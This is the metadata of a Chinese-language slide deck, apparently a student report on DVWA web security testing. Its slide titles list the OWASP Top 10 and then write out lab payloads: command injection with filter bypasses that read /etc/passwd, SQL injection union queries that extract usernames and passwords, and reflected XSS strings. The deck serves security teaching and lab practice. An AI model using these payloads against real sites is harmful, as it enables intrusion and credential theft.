      <vt:lpstr>Sensitive Data Exposure 敏感資料外漏</vt:lpstr>
      <vt:lpstr>XML External Entities (XXE) 外部處理器漏洞</vt:lpstr>
      <vt:lpstr>Broken Access Control  存取控制的破解 </vt:lpstr>
      <vt:lpstr>Security Misconﬁguration  不安全的組態設定 </vt:lpstr>
      <vt:lpstr>Cross-Site Scripting（XSS) 跨站腳本攻擊</vt:lpstr>
      <vt:lpstr>Insecure Deserialization 不安全的反序列化漏洞</vt:lpstr>
      <vt:lpstr>Using Components with  Known Vulnerabilities 使用已知漏洞元件 </vt:lpstr>
      <vt:lpstr>Insufﬁcient Logging &amp; Monitoring  記錄與監控不足 </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Zoom資安問題</vt:lpstr>
      <vt:lpstr>網站漏洞</vt:lpstr>
      <vt:lpstr>網軍攻擊</vt:lpstr>
      <vt:lpstr>貨幣被盜走</vt:lpstr>
      <vt:lpstr>BGP劫持</vt:lpstr>
      <vt:lpstr>微軟的資安漏洞</vt:lpstr>
      <vt:lpstr>用戶憑證被偷</vt:lpstr>
      <vt:lpstr>DVWA實戰</vt:lpstr>
      <vt:lpstr>測試 command injection 127.0.0.1</vt:lpstr>
      <vt:lpstr>漏洞測試 command injection 127.0.0.1; cat /etc/passwd</vt:lpstr>
      <vt:lpstr>漏洞測試 command injection www.ksu.edu.tw; cat /etc/passwd</vt:lpstr>
      <vt:lpstr>漏洞測試 command injection www.google.com; cat /etc/passwd</vt:lpstr>
      <vt:lpstr>127.0.0.1;ls   command injection    等級low</vt:lpstr>
      <vt:lpstr>直接看代碼，它把’&amp;&amp;’和’;’ 都變成了空白(過濾掉了)</vt:lpstr>
      <vt:lpstr>127.0.0.1&amp;;&amp;ls 等級medium   command injection</vt:lpstr>
      <vt:lpstr>127.0.0.1&amp;ls 等級medium   command injection</vt:lpstr>
      <vt:lpstr>127.0.0.1 |ls(可以把空白字串在|的左邊來進行繞過注入) 等級high   command injection</vt:lpstr>
      <vt:lpstr>輸入1’or’1’=’1，查詢成功 等級low  SQL Injection</vt:lpstr>
      <vt:lpstr>輸入‘union select database(),2# 查詢資料庫  SQL Injection</vt:lpstr>
      <vt:lpstr>輸入‘union select table_name,2 from information_schema.tables where table_schema=0x64767761# 查詢表名   SQL Injection</vt:lpstr>
      <vt:lpstr>輸入‘union select column_name,2 from information_schema.columns where table_name=0x7573657273# 查詢users下的列名  SQL Injection</vt:lpstr>
      <vt:lpstr>輸入‘union select user,password from users#  查詢user，password的資料   SQL Injection</vt:lpstr>
      <vt:lpstr>輸入1’or’12’=’12 查詢user  SQL Injection</vt:lpstr>
      <vt:lpstr>輸入1‘ or 1=1 order by 2 # SQL查詢語言中中的字段數 SQL Injection</vt:lpstr>
      <vt:lpstr>輸入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #  獲取表格中的標題 </vt:lpstr>
      <vt:lpstr>1‘ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users # 下載數據庫</vt:lpstr>
      <vt:lpstr>&lt;script&gt;alert(/xss/)&lt;/script&gt; 等級low  XSS（Reflected）</vt:lpstr>
      <vt:lpstr>輸入&lt;img src=1 onerror=alert(/xss/)&gt; 通過img的src注入惡意的js代碼 等級low  XSS（Reflected）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網站漏洞分析與實務 DVWA網站安全測試報告</dc:title>
  <dc:creator>有言 陳</dc:creator>
  <cp:lastModifiedBy>有言 陳</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-05T12:09:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-14T14:16:08Z</dcterms:modified>
</cp:coreProperties>
</file>